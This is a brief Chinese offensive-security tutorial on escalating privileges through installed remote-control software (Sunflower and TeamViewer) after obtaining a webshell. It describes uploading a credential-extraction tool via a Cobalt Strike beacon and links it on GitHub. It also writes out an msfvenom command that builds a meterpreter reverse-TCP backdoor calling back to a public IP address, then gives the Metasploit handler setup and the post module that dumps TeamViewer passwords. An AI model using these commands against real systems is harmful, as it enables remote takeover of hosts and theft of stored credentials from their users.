目录
电脑(服务器)装的第三方应用越多,安全隐患越大
向日葵漏洞提权
已经拿到了webshell权限,这里的权限是普通用户的权限,查看服务进程
tasklist /svc
发现对方主机上存在向日葵的进程
将其上线CS上,尝试通过CS抓取向日葵密码
上传工具到对方服务器
通过beacon执行工具
得到机器密文,这就是验证码,使用脚本解密
GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具
接下来可以使用向日葵远控软件直接连接靶机,向日葵的权限往往是高权限
Teamviewer提权
后门上线权限必须是管理员权限,低权限用户不能获取
上线MSF
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run
通过MSF模块获得passwd
run post/windows/gather/credentials/teamviewer_passwords
密码一致,为uaq123
CS也有相关的插件可以利用
还有比如:Xshell Navicat 浏览器的密码都可以通过CS进行抓取